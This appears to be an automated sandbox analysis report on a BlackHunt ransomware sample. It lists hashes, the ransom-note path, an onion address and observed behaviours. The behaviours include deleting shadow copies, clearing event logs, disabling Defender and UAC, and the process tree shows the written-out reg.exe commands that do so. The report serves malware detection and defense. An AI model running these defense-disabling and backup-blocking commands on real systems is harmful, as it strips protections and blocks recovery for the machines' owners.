Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
4s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:44
Static task
static1
Behavioral task
behavioral1
Sample
20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
Resource
win10v2004-20231222-en
General
-
Target
20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
-
Size
707KB
-
MD5
e6e042228afcc18239f234c4e9d44d55
-
SHA1
bfec002de8e368ea515c656a9cc8c200f357b0eb
-
SHA256
20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5
-
SHA512
50447dbb92b15d5f332cbd4129b7dcadd0e04849f6bf1c75a94f19bf49f7903c9a2a98bb47e48c32f91bdd3dc8e5912689b11853fdb94e06d1a246b754663aa6
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T8xvnh:6uaTmkZJ+naie5OTamgEoKxLWSlh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7744 fsutil.exe 5892 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 8232 wevtutil.exe 7552 wevtutil.exe 8012 wevtutil.exe 7684 wevtutil.exe 8680 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8188 bcdedit.exe 6748 bcdedit.exe 3484 bcdedit.exe 5812 bcdedit.exe -
Renames multiple (537) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7024 wbadmin.exe 6428 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\S: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\U: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\H: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\L: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\W: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\F: BackgroundTransferHost.exe File opened (read-only) \??\K: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\Z: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\X: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\M: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\Q: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\E: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\R: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\N: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\I: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\P: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\G: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\V: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\B: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\T: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\A: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\J: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfr.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\dotnet\ThirdPartyNotices.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk-1.8\lib\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jre-1.8\lib\cmm\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightItalic.ttf 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\SelectRevoke.3g2 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\limited\local_policy.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightDemiItalic.ttf 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\zlib.md 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\mesa3d.md 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\zipfs.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterRegular.ttf 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jre-1.8\lib\applet\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\dotnet\swidtag\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\ir.idl 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\cryptix.md 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_pt_BR.properties 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\LICENSE 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk-1.8\jre\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk-1.8\legal\jdk\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\xerces.md 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\jvm.lib 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jre-1.8\lib\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\SplitGrant.ppt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\java.policy 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\bcel.md 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\cursors.properties 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\co\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\7-Zip\License.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\README.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\gstreamer.md 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\lcms.md 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\ecc.md 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\calendars.properties 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 11872 12964 WerFault.exe 262 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2880 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7320 vssadmin.exe 1560 vssadmin.exe 8348 vssadmin.exe 2000 vssadmin.exe 7356 vssadmin.exe 7344 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 7064 taskkill.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6776 PING.EXE -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeRestorePrivilege 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeBackupPrivilege 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeTakeOwnershipPrivilege 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeAuditPrivilege 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeSecurityPrivilege 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeIncBasePriorityPrivilege 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeBackupPrivilege 2932 vssvc.exe Token: SeRestorePrivilege 2932 vssvc.exe Token: SeAuditPrivilege 2932 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1184 wrote to memory of 2800 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 93 PID 1184 wrote to memory of 2800 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 93 PID 1184 wrote to memory of 5080 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 172 PID 1184 wrote to memory of 5080 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 172 PID 1184 wrote to memory of 4484 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 95 PID 1184 wrote to memory of 4484 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 95 PID 5080 wrote to memory of 4272 5080 cmd.exe 216 PID 5080 wrote to memory of 4272 5080 cmd.exe 216 PID 1184 wrote to memory of 4448 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 215 PID 1184 wrote to memory of 4448 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 215 PID 2800 wrote to memory of 1180 2800 cmd.exe 175 PID 2800 wrote to memory of 1180 2800 cmd.exe 175 PID 1184 wrote to memory of 4468 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 214 PID 1184 wrote to memory of 4468 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 214 PID 1184 wrote to memory of 4140 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 212 PID 1184 wrote to memory of 4140 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 212 PID 1184 wrote to memory of 324 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 210 PID 1184 wrote to memory of 324 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 210 PID 4484 wrote to memory of 4532 4484 cmd.exe 99 PID 4484 wrote to memory of 4532 4484 cmd.exe 99 PID 4448 wrote to memory of 2320 4448 cmd.exe 209 PID 4448 wrote to memory of 2320 4448 cmd.exe 209 PID 1184 wrote to memory of 2540 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 100 PID 1184 wrote to memory of 2540 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 100 PID 4468 wrote to memory of 1148 4468 cmd.exe 101 PID 4468 wrote to memory of 1148 4468 cmd.exe 101 PID 1184 wrote to memory of 3048 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 207 PID 1184 wrote to memory of 3048 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 207 PID 1184 wrote to memory of 4640 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 205 PID 1184 wrote to memory of 4640 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 205 PID 4140 wrote to memory of 2176 4140 cmd.exe 204 PID 4140 wrote to memory of 2176 4140 cmd.exe 204 PID 324 wrote to memory of 4820 324 cmd.exe 102 PID 324 wrote to memory of 4820 324 cmd.exe 102 PID 2540 wrote to memory of 2404 2540 cmd.exe 202 PID 2540 wrote to memory of 2404 2540 cmd.exe 202 PID 1184 wrote to memory of 5064 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 201 PID 1184 wrote to memory of 5064 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 201 PID 3048 wrote to memory of 2740 3048 cmd.exe 199 PID 3048 wrote to memory of 2740 3048 cmd.exe 199 PID 1184 wrote to memory of 1080 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 198 PID 1184 wrote to memory of 1080 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 198 PID 4640 wrote to memory of 2020 4640 cmd.exe 108 PID 4640 wrote to memory of 2020 4640 cmd.exe 108 PID 1184 wrote to memory of 676 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 124 PID 1184 wrote to memory of 676 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 124 PID 1184 wrote to memory of 5024 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 107 PID 1184 wrote to memory of 5024 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 107 PID 1184 wrote to memory of 3508 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 197 PID 1184 wrote to memory of 3508 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 197 PID 5064 wrote to memory of 5076 5064 cmd.exe 196 PID 5064 wrote to memory of 5076 5064 cmd.exe 196 PID 1080 wrote to memory of 1780 1080 cmd.exe 194 PID 1080 wrote to memory of 1780 1080 cmd.exe 194 PID 1184 wrote to memory of 228 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 193 PID 1184 wrote to memory of 228 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 193 PID 676 wrote to memory of 4444 676 Conhost.exe 191 PID 676 wrote to memory of 4444 676 Conhost.exe 191 PID 1184 wrote to memory of 2256 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 190 PID 1184 wrote to memory of 2256 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 190 PID 5024 wrote to memory of 3680 5024 cmd.exe 119 PID 5024 wrote to memory of 3680 5024 cmd.exe 119 PID 1184 wrote to memory of 4260 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 188 PID 1184 wrote to memory of 4260 1184 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 188 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1184 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:5080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:1180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4532
-
-
-
